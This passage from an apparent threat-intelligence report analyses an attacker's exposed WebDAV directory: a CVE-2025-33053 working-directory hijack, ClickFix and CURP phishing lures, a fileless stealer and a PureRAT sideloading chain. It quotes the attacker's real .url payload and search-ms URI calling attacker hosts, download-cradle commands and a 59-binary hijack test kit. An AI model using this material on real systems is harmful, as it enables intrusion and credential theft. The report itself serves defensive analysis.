1. .url file contains URL=path to iediagcmd.exe (legitimate IE tool)
2. .url sets WorkingDirectory to WebDAV share
3. When clicked: iediagcmd.exe starts with cwd = WebDAV
4. iediagcmd internally calls: route.exe, ipconfig.exe, netsh.exe, ping.exe
5. Process.Start() searches in working directory FIRST
6. WebClient auto-starts when accessing WebDAV
7. Attacker's route.exe (renamed putty.exe) runs from WebDAV
8. NO SmartScreen, NO MoTW warnings!

REQUIREMENTS TO MAKE TEST WORK:
================================

1. iediagcmd.exe MUST exist on victim machine
   Path: C:\Program Files\Internet Explorer\iediagcmd.exe
   - Win10 (1607-22H2):        YES
   - Win11 21H2/22H2/23H2:     usually YES
   - Win11 24H2 (IE removed):  NO (this is why your F-series failed!)
   - Check on victim:
     dir "C:\Program Files\Internet Explorer\iediagcmd.exe"

2. WebDAV MUST have file named EXACTLY "route.exe"
   NOT putty.exe! iediagcmd will only execute these names:
   - route.exe
   - ipconfig.exe
   - netsh.exe
   - ping.exe
   On your WebDAV server, RENAME putty.exe to route.exe
   Place at: \\TA_C2\Downloads\route.exe

3. Microsoft patch from June 2025 MUST NOT be installed
   Check: Get-HotFix | Where-Object {$_.HotFixID -match "KB5060"}
   If patched, exploit fails.

ALTERNATIVE LOLBINS (if iediagcmd.exe missing):
================================================
F4_CustomShellHost_explorer.url - uses CustomShellHost.exe
   (mentioned in CheckPoint report - spawns explorer.exe)
F5_OfficeC2RClient_alternative.url - uses Office C2R client
   (if Office is installed)

REAL ATTACK PAYLOAD WAS:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D</pre><p language="html"><span><em>Figure 2: Contents of README, likely generated by LLM, found in the exposed directory.</em></span><em><br></em>⠀</p><p><span>The testing approach was methodical and included the below:</span></p><p><span><strong>Transports</strong></span><span>: WebDAV over </span><span><span data-type="inlineCode">@80</span></span><span> and </span><span><span data-type="inlineCode">@ssl@443</span></span></p><p><span><strong>Path formats</strong></span><span>: </span><span><span data-type="inlineCode">DavWWWRoot</span></span><span> vs. plain UNC</span></p><p><span><strong>Fallback LOLBins</strong></span><span>: </span><span><span data-type="inlineCode">CustomShellHost.exe</span></span><span>, </span><span><span data-type="inlineCode">OfficeC2RClient.exe</span></span><span>, and many more for hosts where </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> is absent</span></p><p><span><strong>Download cradles</strong></span><span>: </span><span><span data-type="inlineCode">bitsadmin /transfer</span></span><span>, </span><span><span data-type="inlineCode">certutil -urlcache -split -f</span></span><span>, </span><span><span data-type="inlineCode">mshta http(s)://…</span></span></p><p><span><strong>Shortcut launchers</strong></span><span>: PowerShell </span><span><span data-type="inlineCode">IEX (New-Object Net.WebClient).DownloadString(...)</span></span><span>, hidden/minimized windows</span></p><p><span><strong>Explorer containers</strong></span><span>: </span><span><span data-type="inlineCode">search-ms:</span></span><span> queries and </span><span><span data-type="inlineCode">.library-ms</span></span><span> files exposing remote payloads</span></p><p><span><strong>ClickFix pages</strong></span><span>: relying on user copy/paste execution</span></p><p><span><strong>Filename spoofing</strong></span><span>: RTLO (U+202E), double extensions, and whitespace padding before </span><span><span data-type="inlineCode">.exe</span></span><span> / </span><span><span data-type="inlineCode">.scr</span></span></p><h2>The lure factory</h2><p><span>The lure themes were broad and familiar: invoices, privacy policies, contracts, signed documents, finance reports, Labcorp-themed reports, salary statements, and notification policies.</span></p><p><span>Judging by the lure themes, we concluded that the attacker is targeting enterprise Windows users who are likely to open routine documents.</span></p><p><span>The threat actor also invested heavily in making files look “safe”. Many lure names mimicked PDFs or office documents. Others used fake icons associated with common software. Some attempted to hide arguments or launch windows minimized. Clearly, the goal was to make malicious execution feel like ordinary document handling.</span></p><p><span>The directory also contained ClickFix HTML lures. These pages mimicked familiar services, application errors, and document-access workflows to convince users to copy and run a command. The lures were disguised as Cloudflare verification checks, Adobe or Word document errors, Microsoft login pages, Chrome update messages, and Discord-themed notices. Filenames such as </span><span><span data-type="inlineCode">Fix_Connection_Error.html</span></span><span>, </span><span><span data-type="inlineCode">Update_Required.html</span></span><span>, </span><span><span data-type="inlineCode">Secure_Document_Access.html</span></span><span>, </span><span><span data-type="inlineCode">Verification_Failed.html</span></span><span>, and </span><span><span data-type="inlineCode">Open_Document_Instructions.html</span></span><span> show how the actor repackaged the same execution pattern under different social-engineering themes.</span></p><p><span>The commands typically launched PowerShell to fetch remote content, used </span><span><span data-type="inlineCode">cmd.exe</span></span><span> to open payloads from WebDAV or UNC paths, or used utilities like </span><span><span data-type="inlineCode">rundll32</span></span><span> and </span><span><span data-type="inlineCode">mshta</span></span><span> to proxy execution. Many referenced attacker-controlled paths, temporary directories, hidden windows, or encoded arguments to reduce visibility.</span></p><h2>The payload chains </h2><p><span>The exposed directory contained many payloads, but we did not reverse every binary in the collection. We initially started with reverse engineering, but after analyzing several chains, we found repeated packaging patterns and suspected that some staged files may have led to the same or closely related final payloads.</span></p><p><span>We therefore shifted from exhaustive reverse engineering to triage. We reviewed several files, including </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, </span><span><span data-type="inlineCode">CursorSetup</span></span><span>, </span><span><span data-type="inlineCode">ReportFinal.rsc.pdf</span></span><span>, </span><span><span data-type="inlineCode">ReportFina.exe</span></span><span> and </span><span><span data-type="inlineCode">pdfgear_setup_v2.1.16.exe</span></span><span>, and prioritized payloads that either represented distinct delivery approaches or were tied to observed campaign activity.</span></p><p><span>Our main focus became the most commonly delivered file in the most recent CURP campaign, based on artifacts we found in cPanel. This gave us the clearest link between the exposed delivery infrastructure and active campaign activity. </span></p><p><span>This scope is intentional. This post is about the attacker’s delivery workflow, not a full reverse-engineering report for every sample in the directory. We use the payload analysis to show how the operator packaged lures, staged loaders, tested execution methods, and moved from delivery to final payload execution. </span></p><h2><span>Case study 1: CURP campaign targeting Mexico</span></h2><p><span>Our MDR alert began with a user who landed on the phishing site </span><span><span data-type="inlineCode">www[.]gobf[.]mx</span></span><span>, a typosquat impersonating the Mexican government's CURP (Clave Única de Registro de Población) national-ID lookup service at </span><a href="https://www.gob.mx/curp/" target="_blank"><span>https://www.gob.mx/curp/</span></a><span>. The phishing site presented a convincing single-page application that asked victims to enter CURP identity data and retrieve an official record.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico%E2%80%99s-CURP-lookup-service.png" alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-uid="bltc4d4e8c3f881bba8" data-sys-asset-filename="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." data-sys-asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic.</figcaption></div></figure><p>⠀</p><p><span>The site’s client-side JavaScript handled the fake ID lookup flow and then triggered payload delivery when the victim clicked the download button. Instead of downloading a PDF directly, the script invoked a </span><span><span data-type="inlineCode">search-ms:</span></span><span> URI that opened the operator’s remote WebDAV share as a Windows Explorer search view filtered to </span><span><span data-type="inlineCode">.scr</span></span><span> files:</span></p><p><span></span></p><pre language="c">search-ms:displayname=Search Results in \\onedrive.cv@80\Downloads\CURP
         &amp;query=*.scr
         &amp;crumb=location:\\onedrive.cv@80\Downloads\CURP</pre><p>⠀<br><span>It's worth mentioning that the malicious Javascript with russian comments appears to be also generated with the help of GenAI. As you can see in the screenshot above it contains emojis and comments which are very typical for the LLM models.</span></p><p><span>The exposed Simba Service panel tied this phishing flow back to the attacker’s delivery infrastructure. The </span><span><span data-type="inlineCode">CURP</span></span><span> folder was the most-accessed campaign folder, with 2,384 recorded interactions. The same count appeared for </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span>, making it the clearest link between the phishing site, the WebDAV delivery path, and active campaign activity.</span><br></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" alt="Simba-Service-WebDAV-dashboard-CURP.png" caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-uid="bltedc57850fe037c68" data-sys-asset-filename="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." data-sys-asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions.</figcaption></div></figure><p>⠀</p><p><span>Although </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span> appeared to be a PDF, it was actually a right-to-left override (RTLO) masqueraded </span><span><span data-type="inlineCode">.scr</span></span><span> executable built with a Delphi/Inno Setup installer. Once executed, it extracted and launched the </span><span><span data-type="inlineCode">Fo-Binary.exe</span></span><span> loader, initiating the multi-stage infection chain.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" alt="Execution-chain-PDF-lure.jpg" caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" data-sys-asset-uid="bltf312b78111eb9912" data-sys-asset-filename="Execution-chain-PDF-lure.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." data-sys-asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration.</figcaption></div></figure><p>⠀</p><p><span>The final payload was an unknown .NET information stealer, operated entirely fileless-ly to evade disk-based detection. The execution sequence followed as such:</span></p><ul><li><span><strong>Decryption:</strong></span><span> The </span><span><span data-type="inlineCode">Fcqleh</span></span><span> loader decrypted the embedded payload using AES and GZip.</span></li><li><p><span><strong>Reflective Loading: </strong></span><span>The loader mapped the payload directly into memory using the </span><span><span data-type="inlineCode">Assembly.Load(byte[])</span></span><span> API.</span></p></li><li><p><span><strong>Process Injection:</strong></span><span> The malicious code was executed inside a legitimate, EV-signed Qihoo 360 process via process hollowing, allowing the malicious code to run under a trusted signed process image.</span></p></li></ul><p><span>The decrypted in-memory configuration exposed the payload’s feature set and version </span><span><span data-type="inlineCode">4.4.3</span></span><span>. It also contained the build tag </span><span><span data-type="inlineCode">06x12x2026SantaEbash2</span></span><span>, which matched toolkit timestamps from June 12, 2026.</span></p><p><span>Once running, the stealer targeted cryptocurrency assets, browser data, messaging sessions, and local application data. Its collection logic included around 20 desktop wallet clients and browser wallet extensions, saved browser usernames, passwords, cookies, session tokens, the Telegram </span><span><span data-type="inlineCode">tdata</span></span><span> session database, Foxmail data, and a screenshot of the victim’s desktop.</span></p><p><span>The payload also included anti-analysis checks. The payload checked for the </span><span><span data-type="inlineCode">COR_PROFILER</span></span><span> environment variable and called </span><span><span data-type="inlineCode">IsDebuggerPresent</span></span><span>. If the malware detected that it was being monitored or debugged, it immediately called </span><span><span data-type="inlineCode">FailFast</span></span><span> to kill the process. The stealer also delayed decrypting its watchlist and collection configuration until after a successful C2 handshake, preventing its full functionality from being revealed in isolated sandboxes. </span></p><p><span>Collected data was exfiltrated to </span><span><span data-type="inlineCode">77[.]110.127.205</span></span><span> (alias </span><span><span data-type="inlineCode">google.services.ug</span></span><span>, certificate </span><span><span data-type="inlineCode">CN=Eglgyqnoa</span></span><span>) over </span><span><span data-type="inlineCode">SslStream</span></span><span> (TLS without SNI) and raw </span><span><span data-type="inlineCode">Socket</span></span><span>.</span><span>The stolen data was sent as a multipart HTTP POST request to </span><span><span data-type="inlineCode">/c2</span></span><span>.</span></p><p><span>Based on the analyzed behavior, the payload functioned as an information stealer focused on credential, wallet, and session theft.</span></p><h2>Case study 2: The "DlrtyGames" sideloading chain</h2><p><span>While the </span><span><span data-type="inlineCode">ReportFinal</span></span><span> lure used an Inno Setup installer to launch a fileless stealer, a second campaign directory on the server, </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, showed a different delivery architecture. This chain was built to deploy a modular RAT through DLL sideloading, IDAT, process hollowing, and persistence.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> chain began with a silent 7-Zip SFX dropper, </span><span><span data-type="inlineCode">DlrtyGames.exe</span></span><span>. It extracted a benign, signed Ubisoft binary, </span><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span>, into the victim’s temporary directory alongside a trojanized dependency, </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. </span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" alt="DlrtyGames-execution-chain.jpg" caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" data-sys-asset-uid="bltf89ec69e4241e5c3" data-sys-asset-filename="DlrtyGames-execution-chain.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." data-sys-asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution.</figcaption></div></figure><p>⠀</p><p><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span> used DLL sideloading to load </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. This decoded its configuration, resolved APIs by hash, and manually mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span>. The mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span> stage then read </span><span><span data-type="inlineCode">loader-pool.db</span></span><span>, a PNG file whose encrypted modules were stored across IDAT chunks. After a 45-second sleep delay, it reassembled and decrypted the embedded content, set up persistence, performed COM auto-elevation through </span><span><span data-type="inlineCode">dllhost.exe</span></span><span>, and prepared the final hollowing stage.</span></p><p><span>The final injection stage was handled by an x86 PIC shellcode blob carved from </span><span><span data-type="inlineCode">loader-pool.db</span></span><span> at offset </span><span><span data-type="inlineCode">0xb516a</span></span><span>. That shellcode created signed host processes such as </span><span><span data-type="inlineCode">MegArray.exe</span></span><span> or </span><span><span data-type="inlineCode">Crisp.exe</span></span><span> in a suspended state, unmapped their original image, wrote the payload into the process, updated thread context, and resumed execution. The result was a modular .NET RAT running inside a signed host process.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> payload was a modular RAT with plugins for keylogging, screenshots, window monitoring, and C2 communication. Its keylogger module used plaintext keyword triggers for payment, banking, credit, and cryptocurrency activity, including </span><span><span data-type="inlineCode"><em>relaypayments.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>plaid</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fiservapps</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>payoneer</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>google pay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>coinbase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Zelle</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>paypal</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>link.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>amazonrelay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Exodus</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Electrum</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Bitcoin</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>monero</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed Phrase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>12</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>FCU</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Credit Union</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Account Overview</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Available Balance</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Merchant</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>online access</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>debit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>credit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>cvv</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>card</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>settlement</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fees</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>loans</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>bank</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>banking</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>finance</em></span></span><span><em>, and </em></span><span><span data-type="inlineCode"><em>invest</em></span></span><span><em>. </em></span></p><p><span>The RAT also targeted browser wallet-extension artifacts and Chrome user data, including cookies and saved login data.</span></p><p><span>The two chains used different payloads and C2 infrastructure. In case study one, the stealer exfiltrated to </span><span><span data-type="inlineCode">77[.]110[.]127[.]205:56003</span></span><span>, while in the case study two stealer chain communicated with </span><span><span data-type="inlineCode">23[.]94[.]252[.]228:57666</span></span><span>. Based on our observations, the final RAT payload in both chains was identified as .NET-based PureRAT.</span></p><h3>GenAI adoption</h3><p><span>Several artifacts make it clear the attacker certainly used LLMs to build and iterate this operation. The directory is packed with structured README files, neatly formatted lure-generation guides, detailed test writeups, and matrix-style outputs that look exactly like templated or generated content. </span></p><p><span></span></p><pre language="c">═══════════════════════════════════════════════════════════════════
  WORKING DIRECTORY HIJACKING — COMPREHENSIVE TEST KIT
  for Windows 11 24H2
═══════════════════════════════════════════════════════════════════

This kit contains 59 .url files targeting different Windows binaries
that POTENTIALLY have the same Working Directory hijacking issue as
CVE-2025-33053 (Stealth Falcon, iediagcmd.exe).

ALL .url files use this exact format (same as the real APT attack):
  [InternetShortcut]
  URL=C:\path\to\target.exe         &lt;- legitimate binary
  WorkingDirectory=\\[REDACTED]@80\Downloads   &lt;- WebDAV (triggers WebClient!)
  ShowCommand=7                     &lt;- start minimized (hide alert windows)
  IconIndex=13                      &lt;- (decoy icon)
  IconFile=msedge.exe               &lt;- (decoy icon)

═══════════════════════════════════════════════════════════════════
HOW TO TEST (5 minutes)
═══════════════════════════════════════════════════════════════════

STEP 1: Upload ALL files from WEBDAV_PAYLOADS/ folder to:
        \\[REDACTED]\Downloads\
        (59 test files - each is 5KB MessageBox popup exe)

STEP 2: Copy I_LOLBIN_URLS/ folder to your Win11 24H2 machine

STEP 3: Double-click .url files one by one (or all of them in sequence)
        - If popup appears -&gt; HIJACK WORKS! Read parent process name in popup.
        - If nothing happens / error -&gt; doesn't work, move to next.

STEP 4: Tell me which I-numbers showed a popup. I'll integrate working
        ones as new methods in web-renamer.

═══════════════════════════════════════════════════════════════════
PRIORITY TESTING ORDER (most likely to work first)
═══════════════════════════════════════════════════════════════════

TIER 1 - CONFIRMED IN THE WILD:
  I01_iediagcmd.url           - CVE-2025-33053 (needs pre-June 2025 patch)
  I02_CustomShellHost.url     - CheckPoint research (may not exist on Server)

TIER 2 - .NET FRAMEWORK TOOLS (always installed if .NET 4.x present):
  I03_InstallUtil.url         - InstallUtilLib.dll search
  I04_RegAsm.url              - .NET registration
  I05_RegSvcs.url             - .NET services
  I06_CasPol.url              - .NET security policy
  I07_ngentask.url            - NGen native compile (calls ngen.exe!)
  I08_AddInUtil.url           - AddIn util (calls AddInProcess.exe!)
  I10_dfsvc.url               - ClickOnce service
  I15_csc.url                 - C# compiler (may call link.exe)
  I16_vbc.url                 - VB compiler

TIER 3 - WIN11 SYSTEM .NET TOOLS:
  I17_LbfoAdmin.url           - NIC teaming admin
  I19_UevAgentPolicyGenerator.url - UE-V agent (calls .ps1 files!)
  I20_UevAppMonitor.url       - UE-V monitor
  I23_AppVStreamingUX.url     - App-V streaming UI

TIER 4 - LOLBAS Execute-EXE binaries:
  I26_Pcwrun.url              - LOLBAS Execute(EXE)
  I28_WorkFolders.url         - LOLBAS Execute(EXE,Rename)
  I33_stordiag.url            - LOLBAS Execute(EXE) - calls systeminfo etc
  I36_Provlaunch.url          - LOLBAS Execute(CMD) - calls provtool.exe!

TIER 5 - UAC bypass binaries (worth testing):
  I49_fodhelper.url, I50_computerdefaults.url, I52_wsreset.url

═══════════════════════════════════════════════════════════════════
THE THEORY (so you understand WHY this works for some and not others)
═══════════════════════════════════════════════════════════════════

For the attack to succeed, the LOLBin must:
  1. Be a .NET application, OR call ShellExecute/CreateProcess with bare
     name (no full path).
  2. Spawn a child process by NAME (e.g. "ipconfig.exe") not by full path
     (e.g. "C:\Windows\System32\ipconfig.exe").
  3. Be runnable without command-line args.

If ANY of these is false, the hijack fails. Microsoft has been patching
specific binaries (iediagcmd.exe in June 2025) but the general pattern
remains. New vulnerable binaries are discovered regularly.

═══════════════════════════════════════════════════════════════════
WHAT THE POPUP TELLS YOU
═══════════════════════════════════════════════════════════════════

When hijack works, you'll see:
  TEST OK - Working Directory Hijack SUCCESS

  Executed as: route.exe                              &lt;- which name was hijacked
  Full path: \\[REDACTED]@80\Downloads\route.exe    &lt;- ran from WebDAV!
  Working dir: \\[REDACTED]@80\Downloads
  Parent process: iediagcmd                           &lt;- which LOLBin spawned it

═══════════════════════════════════════════════════════════════════
NOTES
═══════════════════════════════════════════════════════════════════

* Some I-files may target binaries that DON'T EXIST on your Win11 24H2
  (e.g. I02_CustomShellHost was missing on my test Server 2025).
  These will silently fail - just move on.

* Some I-files may launch the GUI tool (msconfig, dxdiag, etc.) WITHOUT
  triggering any hijack. That's fine - if no popup appears, no hijack.

* See _MAPPING.csv for full mapping of each .url to its target binary
  and expected child process names.</pre><p><span><em>Figure 7: Context of README.md found in the exposed directory.</em></span><em><br></em><br><span>The attacker left a build-time artifact inside the </span><span><span data-type="inlineCode">generate_test_lnk.ps1</span></span><span> output. The output directory is hardcoded in the </span><span><span data-type="inlineCode">$outDir</span></span><span> variable and exposes part of the attacker’s local project tree:</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-%24outDir-path.png" alt="Hardcoded-$outDir-path.png" caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-$outDir-path.png" data-sys-asset-uid="blt5f481d0cd28d6929" data-sys-asset-filename="Hardcoded-$outDir-path.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." data-sys-asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree.</figcaption></div></figure><p>⠀<em><br></em><span>It is therefore apparent that the entire campaign was likely created using the </span><a href="https://github.com/Akash-nath29/Coderrr" target="_blank"><span>CodeRRR project</span></a><span> with the help of LLM to assist with code generation and campaign development.</span></p><p><span>Another file we found in the directory was </span><span><span data-type="inlineCode">Simba_Service_Presentation.htm</span></span><span>, which appeared to document an attacker-controlled WebDAV delivery/admin panel. The panel also seems to have been generated with LLM assistance, based on its presentation-style formatting, API-documentation structure, emojis, and implementation details.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" alt="Simba-server-screenshot-panel.png" caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" data-sys-asset-uid="blt8a0d6970395b2772" data-sys-asset-filename="Simba-server-screenshot-panel.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." data-sys-asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture.</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" alt="Simba-server-system-requirements.png" caption="Figure 10: Simba service system requirements." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-system-requirements.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" data-sys-asset-uid="blt3c958992fad5cb62" data-sys-asset-filename="Simba-server-system-requirements.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: Simba service system requirements." data-sys-asset-alt="Simba-server-system-requirements.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 10: Simba service system requirements.</figcaption></div></figure><p>⠀</p><p><span>The most telling artifact was a “comprehensive test kit” that expanded the single CVE-2025-33053 technique into 59 </span><span><span data-type="inlineCode">.url</span></span><span> files targeting different Windows binaries, such as .NET tools (</span><span><span data-type="inlineCode">InstallUtil</span></span><span>, </span><span><span data-type="inlineCode">RegAsm</span></span><span>, </span><span><span data-type="inlineCode">RegSvcs</span></span><span>, </span><span><span data-type="inlineCode">ngentask</span></span><span>), system utilities, LOLBAS execute-EXE binaries, and even UAC-bypass candidates. Each file was paired with a stated theory of why the working-directory hijack should work and a priority order for testing.</span></p><p><span>The directory was saturated with structured README files, neatly formatted lure-generation guides, matrix-style test write-ups, emoji-heavy admin-panel documentation, and a </span><span><span data-type="inlineCode">_MAPPING.csv</span></span><span> tying each test file to its target binary and expected child process. The consistency, verbosity, and sheer volume of organized artifacts led us to conclude that the attacker likely used an LLM-assisted workflow to do much of the heavy lifting around documentation, structure, and iteration.</span></p><p></p><pre language="c"># LNK Full Matrix Test — WebDAV Open Methods + Deception Techniques

**Location:** `C:\Users\Administrator\Desktop\LNK-Full-Matrix-Test`  
**Total files:** 60  
**Generated:** 2026-05-30

---

## Overview / Обзор

This folder contains a complete test matrix of **60 LNK shortcut files** combining all available WebDAV open methods with all LNK Deception Techniques supported by the Web-renamer project.

В этой папке находится полная тестовая матрица из **60 LNK-ярлыков**, объединяющих все доступные WebDAV-методы открытия со всеми техниками обмана LNK, поддерживаемыми проектом Web-renamer.

---

## Naming Scheme / Схема именования

All files follow the pattern:  
Все файлы следуют шаблону:

```
HyperPackSetup.&lt;method&gt;.&lt;trick&gt;.&lt;spoof&gt;.lnk
```

